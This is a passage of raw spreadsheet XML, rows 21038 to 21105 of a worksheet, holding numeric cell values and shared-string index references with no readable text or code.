        <v>20302</v>
      </c>
      <c r="D21038" s="2">
        <v>1.0</v>
      </c>
      <c r="E21038" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21038" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21039" ht="15.75" customHeight="1">
      <c r="A21039" s="1">
        <v>5588.0</v>
      </c>
      <c r="B21039" s="2">
        <v>4.6097966E7</v>
      </c>
      <c r="C21039" s="2" t="s">
        <v>20303</v>
      </c>
      <c r="D21039" s="2">
        <v>1.0</v>
      </c>
      <c r="E21039" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21039" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21040" ht="15.75" customHeight="1">
      <c r="A21040" s="1">
        <v>5708.0</v>
      </c>
      <c r="B21040" s="2">
        <v>4.6549043E7</v>
      </c>
      <c r="C21040" s="2" t="s">
        <v>20304</v>
      </c>
      <c r="D21040" s="2">
        <v>1.0</v>
      </c>
      <c r="E21040" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21040" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21041" ht="15.75" customHeight="1">
      <c r="A21041" s="1">
        <v>5709.0</v>
      </c>
      <c r="B21041" s="2">
        <v>4.6549043E7</v>
      </c>
      <c r="C21041" s="2" t="s">
        <v>20305</v>
      </c>
      <c r="D21041" s="2">
        <v>1.0</v>
      </c>
      <c r="E21041" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21041" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21042" ht="15.75" customHeight="1">
      <c r="A21042" s="1">
        <v>5710.0</v>
      </c>
      <c r="B21042" s="2">
        <v>4.6549043E7</v>
      </c>
      <c r="C21042" s="2" t="s">
        <v>20306</v>
      </c>
      <c r="D21042" s="2">
        <v>1.0</v>
      </c>
      <c r="E21042" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21042" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21043" ht="15.75" customHeight="1">
      <c r="A21043" s="1">
        <v>6127.0</v>
      </c>
      <c r="B21043" s="2">
        <v>4.7797041E7</v>
      </c>
      <c r="C21043" s="2" t="s">
        <v>20307</v>
      </c>
      <c r="D21043" s="2">
        <v>1.0</v>
      </c>
      <c r="E21043" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21043" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21044" ht="15.75" customHeight="1">
      <c r="A21044" s="1">
        <v>6182.0</v>
      </c>
      <c r="B21044" s="2">
        <v>4.7907716E7</v>
      </c>
      <c r="C21044" s="2" t="s">
        <v>20308</v>
      </c>
      <c r="D21044" s="2">
        <v>1.0</v>
      </c>
      <c r="E21044" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21044" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21045" ht="15.75" customHeight="1">
      <c r="A21045" s="1">
        <v>6270.0</v>
      </c>
      <c r="B21045" s="2">
        <v>4.8127617E7</v>
      </c>
      <c r="C21045" s="2" t="s">
        <v>20309</v>
      </c>
      <c r="D21045" s="2">
        <v>1.0</v>
      </c>
      <c r="E21045" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21045" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21046" ht="15.75" customHeight="1">
      <c r="A21046" s="1">
        <v>7188.0</v>
      </c>
      <c r="B21046" s="2">
        <v>5.0573182E7</v>
      </c>
      <c r="C21046" s="2" t="s">
        <v>20310</v>
      </c>
      <c r="D21046" s="2">
        <v>1.0</v>
      </c>
      <c r="E21046" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21046" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21047" ht="15.75" customHeight="1">
      <c r="A21047" s="1">
        <v>7414.0</v>
      </c>
      <c r="B21047" s="2">
        <v>5.1139284E7</v>
      </c>
      <c r="C21047" s="2" t="s">
        <v>20311</v>
      </c>
      <c r="D21047" s="2">
        <v>1.0</v>
      </c>
      <c r="E21047" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21047" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21048" ht="15.75" customHeight="1">
      <c r="A21048" s="1">
        <v>7571.0</v>
      </c>
      <c r="B21048" s="2">
        <v>5.1560396E7</v>
      </c>
      <c r="C21048" s="2" t="s">
        <v>20312</v>
      </c>
      <c r="D21048" s="2">
        <v>1.0</v>
      </c>
      <c r="E21048" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21048" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21049" ht="15.75" customHeight="1">
      <c r="A21049" s="1">
        <v>7877.0</v>
      </c>
      <c r="B21049" s="2">
        <v>5.2412681E7</v>
      </c>
      <c r="C21049" s="2" t="s">
        <v>20313</v>
      </c>
      <c r="D21049" s="2">
        <v>1.0</v>
      </c>
      <c r="E21049" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21049" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21050" ht="15.75" customHeight="1">
      <c r="A21050" s="1">
        <v>8073.0</v>
      </c>
      <c r="B21050" s="2">
        <v>5.2988791E7</v>
      </c>
      <c r="C21050" s="2" t="s">
        <v>20314</v>
      </c>
      <c r="D21050" s="2">
        <v>1.0</v>
      </c>
      <c r="E21050" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21050" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21051" ht="15.75" customHeight="1">
      <c r="A21051" s="1">
        <v>8463.0</v>
      </c>
      <c r="B21051" s="2">
        <v>5.4003799E7</v>
      </c>
      <c r="C21051" s="2" t="s">
        <v>20315</v>
      </c>
      <c r="D21051" s="2">
        <v>1.0</v>
      </c>
      <c r="E21051" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21051" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21052" ht="15.75" customHeight="1">
      <c r="A21052" s="1">
        <v>9134.0</v>
      </c>
      <c r="B21052" s="2">
        <v>5.523972E7</v>
      </c>
      <c r="C21052" s="2" t="s">
        <v>20316</v>
      </c>
      <c r="D21052" s="2">
        <v>1.0</v>
      </c>
      <c r="E21052" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21052" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21053" ht="15.75" customHeight="1">
      <c r="A21053" s="1">
        <v>9510.0</v>
      </c>
      <c r="B21053" s="2">
        <v>5.5956372E7</v>
      </c>
      <c r="C21053" s="2" t="s">
        <v>20317</v>
      </c>
      <c r="D21053" s="2">
        <v>1.0</v>
      </c>
      <c r="E21053" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21053" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21054" ht="15.75" customHeight="1">
      <c r="A21054" s="1">
        <v>9523.0</v>
      </c>
      <c r="B21054" s="2">
        <v>5.5980269E7</v>
      </c>
      <c r="C21054" s="2" t="s">
        <v>20318</v>
      </c>
      <c r="D21054" s="2">
        <v>1.0</v>
      </c>
      <c r="E21054" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21054" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21055" ht="15.75" customHeight="1">
      <c r="A21055" s="1">
        <v>9750.0</v>
      </c>
      <c r="B21055" s="2">
        <v>5.6487337E7</v>
      </c>
      <c r="C21055" s="2" t="s">
        <v>20319</v>
      </c>
      <c r="D21055" s="2">
        <v>1.0</v>
      </c>
      <c r="E21055" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21055" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21056" ht="15.75" customHeight="1">
      <c r="A21056" s="1">
        <v>9762.0</v>
      </c>
      <c r="B21056" s="2">
        <v>5.6498814E7</v>
      </c>
      <c r="C21056" s="2" t="s">
        <v>20320</v>
      </c>
      <c r="D21056" s="2">
        <v>1.0</v>
      </c>
      <c r="E21056" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21056" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21057" ht="15.75" customHeight="1">
      <c r="A21057" s="1">
        <v>9793.0</v>
      </c>
      <c r="B21057" s="2">
        <v>5.6532619E7</v>
      </c>
      <c r="C21057" s="2" t="s">
        <v>20321</v>
      </c>
      <c r="D21057" s="2">
        <v>1.0</v>
      </c>
      <c r="E21057" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21057" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21058" ht="15.75" customHeight="1">
      <c r="A21058" s="1">
        <v>9819.0</v>
      </c>
      <c r="B21058" s="2">
        <v>5.6622982E7</v>
      </c>
      <c r="C21058" s="2" t="s">
        <v>20322</v>
      </c>
      <c r="D21058" s="2">
        <v>1.0</v>
      </c>
      <c r="E21058" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21058" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21059" ht="15.75" customHeight="1">
      <c r="A21059" s="1">
        <v>9988.0</v>
      </c>
      <c r="B21059" s="2">
        <v>5.6976598E7</v>
      </c>
      <c r="C21059" s="2" t="s">
        <v>20323</v>
      </c>
      <c r="D21059" s="2">
        <v>1.0</v>
      </c>
      <c r="E21059" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21059" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21060" ht="15.75" customHeight="1">
      <c r="A21060" s="1">
        <v>9995.0</v>
      </c>
      <c r="B21060" s="2">
        <v>5.6993884E7</v>
      </c>
      <c r="C21060" s="2" t="s">
        <v>20324</v>
      </c>
      <c r="D21060" s="2">
        <v>1.0</v>
      </c>
      <c r="E21060" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21060" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21061" ht="15.75" customHeight="1">
      <c r="A21061" s="1">
        <v>10377.0</v>
      </c>
      <c r="B21061" s="2">
        <v>7979788.0</v>
      </c>
      <c r="C21061" s="2" t="s">
        <v>20325</v>
      </c>
      <c r="D21061" s="2">
        <v>1.0</v>
      </c>
      <c r="E21061" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21061" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21062" ht="15.75" customHeight="1">
      <c r="A21062" s="1">
        <v>10408.0</v>
      </c>
      <c r="B21062" s="2">
        <v>9753400.0</v>
      </c>
      <c r="C21062" s="2" t="s">
        <v>20326</v>
      </c>
      <c r="D21062" s="2">
        <v>1.0</v>
      </c>
      <c r="E21062" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21062" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21063" ht="15.75" customHeight="1">
      <c r="A21063" s="1">
        <v>10524.0</v>
      </c>
      <c r="B21063" s="2">
        <v>1.2122503E7</v>
      </c>
      <c r="C21063" s="2" t="s">
        <v>20327</v>
      </c>
      <c r="D21063" s="2">
        <v>1.0</v>
      </c>
      <c r="E21063" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21063" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21064" ht="15.75" customHeight="1">
      <c r="A21064" s="1">
        <v>10657.0</v>
      </c>
      <c r="B21064" s="2">
        <v>1.4204571E7</v>
      </c>
      <c r="C21064" s="2" t="s">
        <v>20328</v>
      </c>
      <c r="D21064" s="2">
        <v>1.0</v>
      </c>
      <c r="E21064" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21064" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21065" ht="15.75" customHeight="1">
      <c r="A21065" s="1">
        <v>10780.0</v>
      </c>
      <c r="B21065" s="2">
        <v>1.5656229E7</v>
      </c>
      <c r="C21065" s="2" t="s">
        <v>20329</v>
      </c>
      <c r="D21065" s="2">
        <v>1.0</v>
      </c>
      <c r="E21065" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21065" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21066" ht="15.75" customHeight="1">
      <c r="A21066" s="1">
        <v>11049.0</v>
      </c>
      <c r="B21066" s="2">
        <v>1.81641E7</v>
      </c>
      <c r="C21066" s="2" t="s">
        <v>20330</v>
      </c>
      <c r="D21066" s="2">
        <v>1.0</v>
      </c>
      <c r="E21066" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21066" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21067" ht="15.75" customHeight="1">
      <c r="A21067" s="1">
        <v>11067.0</v>
      </c>
      <c r="B21067" s="2">
        <v>1.8262657E7</v>
      </c>
      <c r="C21067" s="2" t="s">
        <v>20331</v>
      </c>
      <c r="D21067" s="2">
        <v>1.0</v>
      </c>
      <c r="E21067" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21067" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21068" ht="15.75" customHeight="1">
      <c r="A21068" s="1">
        <v>11350.0</v>
      </c>
      <c r="B21068" s="2">
        <v>2.1279195E7</v>
      </c>
      <c r="C21068" s="2" t="s">
        <v>20332</v>
      </c>
      <c r="D21068" s="2">
        <v>1.0</v>
      </c>
      <c r="E21068" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21068" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21069" ht="15.75" customHeight="1">
      <c r="A21069" s="1">
        <v>11444.0</v>
      </c>
      <c r="B21069" s="2">
        <v>2.1772111E7</v>
      </c>
      <c r="C21069" s="2" t="s">
        <v>20333</v>
      </c>
      <c r="D21069" s="2">
        <v>1.0</v>
      </c>
      <c r="E21069" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21069" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21070" ht="15.75" customHeight="1">
      <c r="A21070" s="1">
        <v>11785.0</v>
      </c>
      <c r="B21070" s="2">
        <v>2.4301488E7</v>
      </c>
      <c r="C21070" s="2" t="s">
        <v>20334</v>
      </c>
      <c r="D21070" s="2">
        <v>1.0</v>
      </c>
      <c r="E21070" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21070" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21071" ht="15.75" customHeight="1">
      <c r="A21071" s="1">
        <v>11831.0</v>
      </c>
      <c r="B21071" s="2">
        <v>2.4668376E7</v>
      </c>
      <c r="C21071" s="2" t="s">
        <v>20335</v>
      </c>
      <c r="D21071" s="2">
        <v>1.0</v>
      </c>
      <c r="E21071" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21071" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21072" ht="15.75" customHeight="1">
      <c r="A21072" s="1">
        <v>11892.0</v>
      </c>
      <c r="B21072" s="2">
        <v>2.5110706E7</v>
      </c>
      <c r="C21072" s="2" t="s">
        <v>20336</v>
      </c>
      <c r="D21072" s="2">
        <v>1.0</v>
      </c>
      <c r="E21072" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21072" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21073" ht="15.75" customHeight="1">
      <c r="A21073" s="1">
        <v>12073.0</v>
      </c>
      <c r="B21073" s="2">
        <v>2.6628281E7</v>
      </c>
      <c r="C21073" s="2" t="s">
        <v>20337</v>
      </c>
      <c r="D21073" s="2">
        <v>1.0</v>
      </c>
      <c r="E21073" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21073" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21074" ht="15.75" customHeight="1">
      <c r="A21074" s="1">
        <v>12806.0</v>
      </c>
      <c r="B21074" s="2">
        <v>3.1525855E7</v>
      </c>
      <c r="C21074" s="2" t="s">
        <v>20338</v>
      </c>
      <c r="D21074" s="2">
        <v>1.0</v>
      </c>
      <c r="E21074" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21074" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21075" ht="15.75" customHeight="1">
      <c r="A21075" s="1">
        <v>13023.0</v>
      </c>
      <c r="B21075" s="2">
        <v>3293930.0</v>
      </c>
      <c r="C21075" s="2" t="s">
        <v>20339</v>
      </c>
      <c r="D21075" s="2">
        <v>1.0</v>
      </c>
      <c r="E21075" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21075" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21076" ht="15.75" customHeight="1">
      <c r="A21076" s="1">
        <v>13306.0</v>
      </c>
      <c r="B21076" s="2">
        <v>3.451305E7</v>
      </c>
      <c r="C21076" s="2" t="s">
        <v>3984</v>
      </c>
      <c r="D21076" s="2">
        <v>1.0</v>
      </c>
      <c r="E21076" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21076" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21077" ht="15.75" customHeight="1">
      <c r="A21077" s="1">
        <v>13383.0</v>
      </c>
      <c r="B21077" s="2">
        <v>3.4912536E7</v>
      </c>
      <c r="C21077" s="2" t="s">
        <v>20340</v>
      </c>
      <c r="D21077" s="2">
        <v>1.0</v>
      </c>
      <c r="E21077" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21077" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21078" ht="15.75" customHeight="1">
      <c r="A21078" s="1">
        <v>13686.0</v>
      </c>
      <c r="B21078" s="2">
        <v>3.6093952E7</v>
      </c>
      <c r="C21078" s="2" t="s">
        <v>20341</v>
      </c>
      <c r="D21078" s="2">
        <v>1.0</v>
      </c>
      <c r="E21078" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21078" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21079" ht="15.75" customHeight="1">
      <c r="A21079" s="1">
        <v>13743.0</v>
      </c>
      <c r="B21079" s="2">
        <v>3.6456329E7</v>
      </c>
      <c r="C21079" s="2" t="s">
        <v>20342</v>
      </c>
      <c r="D21079" s="2">
        <v>1.0</v>
      </c>
      <c r="E21079" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21079" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21080" ht="15.75" customHeight="1">
      <c r="A21080" s="1">
        <v>13880.0</v>
      </c>
      <c r="B21080" s="2">
        <v>3.6990542E7</v>
      </c>
      <c r="C21080" s="2" t="s">
        <v>20343</v>
      </c>
      <c r="D21080" s="2">
        <v>1.0</v>
      </c>
      <c r="E21080" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21080" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21081" ht="15.75" customHeight="1">
      <c r="A21081" s="1">
        <v>13985.0</v>
      </c>
      <c r="B21081" s="2">
        <v>3.7356577E7</v>
      </c>
      <c r="C21081" s="2" t="s">
        <v>20344</v>
      </c>
      <c r="D21081" s="2">
        <v>1.0</v>
      </c>
      <c r="E21081" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21081" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21082" ht="15.75" customHeight="1">
      <c r="A21082" s="1">
        <v>14050.0</v>
      </c>
      <c r="B21082" s="2">
        <v>3.7529216E7</v>
      </c>
      <c r="C21082" s="2" t="s">
        <v>20345</v>
      </c>
      <c r="D21082" s="2">
        <v>1.0</v>
      </c>
      <c r="E21082" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21082" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21083" ht="15.75" customHeight="1">
      <c r="A21083" s="1">
        <v>14385.0</v>
      </c>
      <c r="B21083" s="2">
        <v>3.9048968E7</v>
      </c>
      <c r="C21083" s="2" t="s">
        <v>20346</v>
      </c>
      <c r="D21083" s="2">
        <v>1.0</v>
      </c>
      <c r="E21083" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21083" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21084" ht="15.75" customHeight="1">
      <c r="A21084" s="1">
        <v>15313.0</v>
      </c>
      <c r="B21084" s="2">
        <v>4.2502131E7</v>
      </c>
      <c r="C21084" s="2" t="s">
        <v>20347</v>
      </c>
      <c r="D21084" s="2">
        <v>1.0</v>
      </c>
      <c r="E21084" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21084" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21085" ht="15.75" customHeight="1">
      <c r="A21085" s="1">
        <v>15356.0</v>
      </c>
      <c r="B21085" s="2">
        <v>4.2689582E7</v>
      </c>
      <c r="C21085" s="2" t="s">
        <v>20348</v>
      </c>
      <c r="D21085" s="2">
        <v>1.0</v>
      </c>
      <c r="E21085" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21085" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21086" ht="15.75" customHeight="1">
      <c r="A21086" s="1">
        <v>15737.0</v>
      </c>
      <c r="B21086" s="2">
        <v>4.4084357E7</v>
      </c>
      <c r="C21086" s="2" t="s">
        <v>20349</v>
      </c>
      <c r="D21086" s="2">
        <v>1.0</v>
      </c>
      <c r="E21086" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21086" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21087" ht="15.75" customHeight="1">
      <c r="A21087" s="1">
        <v>15767.0</v>
      </c>
      <c r="B21087" s="2">
        <v>4.4179143E7</v>
      </c>
      <c r="C21087" s="2" t="s">
        <v>20350</v>
      </c>
      <c r="D21087" s="2">
        <v>1.0</v>
      </c>
      <c r="E21087" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21087" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21088" ht="15.75" customHeight="1">
      <c r="A21088" s="1">
        <v>15816.0</v>
      </c>
      <c r="B21088" s="2">
        <v>4.4263121E7</v>
      </c>
      <c r="C21088" s="2" t="s">
        <v>20351</v>
      </c>
      <c r="D21088" s="2">
        <v>1.0</v>
      </c>
      <c r="E21088" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21088" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21089" ht="15.75" customHeight="1">
      <c r="A21089" s="1">
        <v>15824.0</v>
      </c>
      <c r="B21089" s="2">
        <v>4.4304302E7</v>
      </c>
      <c r="C21089" s="2" t="s">
        <v>20352</v>
      </c>
      <c r="D21089" s="2">
        <v>1.0</v>
      </c>
      <c r="E21089" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21089" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21090" ht="15.75" customHeight="1">
      <c r="A21090" s="1">
        <v>16068.0</v>
      </c>
      <c r="B21090" s="2">
        <v>4.5306531E7</v>
      </c>
      <c r="C21090" s="2" t="s">
        <v>20353</v>
      </c>
      <c r="D21090" s="2">
        <v>1.0</v>
      </c>
      <c r="E21090" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21090" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21091" ht="15.75" customHeight="1">
      <c r="A21091" s="1">
        <v>16503.0</v>
      </c>
      <c r="B21091" s="2">
        <v>4.6599859E7</v>
      </c>
      <c r="C21091" s="2" t="s">
        <v>20354</v>
      </c>
      <c r="D21091" s="2">
        <v>1.0</v>
      </c>
      <c r="E21091" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21091" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21092" ht="15.75" customHeight="1">
      <c r="A21092" s="1">
        <v>16675.0</v>
      </c>
      <c r="B21092" s="2">
        <v>4.727891E7</v>
      </c>
      <c r="C21092" s="2" t="s">
        <v>20355</v>
      </c>
      <c r="D21092" s="2">
        <v>1.0</v>
      </c>
      <c r="E21092" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21092" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21093" ht="15.75" customHeight="1">
      <c r="A21093" s="1">
        <v>17307.0</v>
      </c>
      <c r="B21093" s="2">
        <v>4.9308172E7</v>
      </c>
      <c r="C21093" s="2" t="s">
        <v>20356</v>
      </c>
      <c r="D21093" s="2">
        <v>1.0</v>
      </c>
      <c r="E21093" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21093" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21094" ht="15.75" customHeight="1">
      <c r="A21094" s="1">
        <v>17342.0</v>
      </c>
      <c r="B21094" s="2">
        <v>4.9397846E7</v>
      </c>
      <c r="C21094" s="2" t="s">
        <v>20357</v>
      </c>
      <c r="D21094" s="2">
        <v>1.0</v>
      </c>
      <c r="E21094" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21094" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21095" ht="15.75" customHeight="1">
      <c r="A21095" s="1">
        <v>17374.0</v>
      </c>
      <c r="B21095" s="2">
        <v>4.9510656E7</v>
      </c>
      <c r="C21095" s="2" t="s">
        <v>20358</v>
      </c>
      <c r="D21095" s="2">
        <v>1.0</v>
      </c>
      <c r="E21095" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21095" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21096" ht="15.75" customHeight="1">
      <c r="A21096" s="1">
        <v>17450.0</v>
      </c>
      <c r="B21096" s="2">
        <v>4.9807575E7</v>
      </c>
      <c r="C21096" s="2" t="s">
        <v>20359</v>
      </c>
      <c r="D21096" s="2">
        <v>1.0</v>
      </c>
      <c r="E21096" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21096" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21097" ht="15.75" customHeight="1">
      <c r="A21097" s="1">
        <v>17723.0</v>
      </c>
      <c r="B21097" s="2">
        <v>5.0627166E7</v>
      </c>
      <c r="C21097" s="2" t="s">
        <v>20360</v>
      </c>
      <c r="D21097" s="2">
        <v>1.0</v>
      </c>
      <c r="E21097" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21097" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21098" ht="15.75" customHeight="1">
      <c r="A21098" s="1">
        <v>17896.0</v>
      </c>
      <c r="B21098" s="2">
        <v>5.1082491E7</v>
      </c>
      <c r="C21098" s="2" t="s">
        <v>20361</v>
      </c>
      <c r="D21098" s="2">
        <v>1.0</v>
      </c>
      <c r="E21098" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21098" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21099" ht="15.75" customHeight="1">
      <c r="A21099" s="1">
        <v>18054.0</v>
      </c>
      <c r="B21099" s="2">
        <v>5.1586239E7</v>
      </c>
      <c r="C21099" s="2" t="s">
        <v>20362</v>
      </c>
      <c r="D21099" s="2">
        <v>1.0</v>
      </c>
      <c r="E21099" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21099" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21100" ht="15.75" customHeight="1">
      <c r="A21100" s="1">
        <v>18144.0</v>
      </c>
      <c r="B21100" s="2">
        <v>5.1837893E7</v>
      </c>
      <c r="C21100" s="2" t="s">
        <v>20363</v>
      </c>
      <c r="D21100" s="2">
        <v>1.0</v>
      </c>
      <c r="E21100" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21100" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21101" ht="15.75" customHeight="1">
      <c r="A21101" s="1">
        <v>18803.0</v>
      </c>
      <c r="B21101" s="2">
        <v>5.3880105E7</v>
      </c>
      <c r="C21101" s="2" t="s">
        <v>20364</v>
      </c>
      <c r="D21101" s="2">
        <v>1.0</v>
      </c>
      <c r="E21101" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21101" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21102" ht="15.75" customHeight="1">
      <c r="A21102" s="1">
        <v>18987.0</v>
      </c>
      <c r="B21102" s="2">
        <v>5.441386E7</v>
      </c>
      <c r="C21102" s="2" t="s">
        <v>20365</v>
      </c>
      <c r="D21102" s="2">
        <v>1.0</v>
      </c>
      <c r="E21102" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21102" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21103" ht="15.75" customHeight="1">
      <c r="A21103" s="1">
        <v>19022.0</v>
      </c>
      <c r="B21103" s="2">
        <v>5.4537849E7</v>
      </c>
      <c r="C21103" s="2" t="s">
        <v>20366</v>
      </c>
      <c r="D21103" s="2">
        <v>1.0</v>
      </c>
      <c r="E21103" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21103" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21104" ht="15.75" customHeight="1">
      <c r="A21104" s="1">
        <v>19558.0</v>
      </c>
      <c r="B21104" s="2">
        <v>5.605664E7</v>
      </c>
      <c r="C21104" s="2" t="s">
        <v>20367</v>
      </c>
      <c r="D21104" s="2">
        <v>1.0</v>
      </c>
      <c r="E21104" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21104" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21105" ht="15.75" customHeight="1">
      <c r="A21105" s="1">
        <v>19579.0</v>
      </c>
      <c r="B21105" s="2">
        <v>5.6152122E7</v>
      </c>
      <c r="C21105" s="2" t="s">
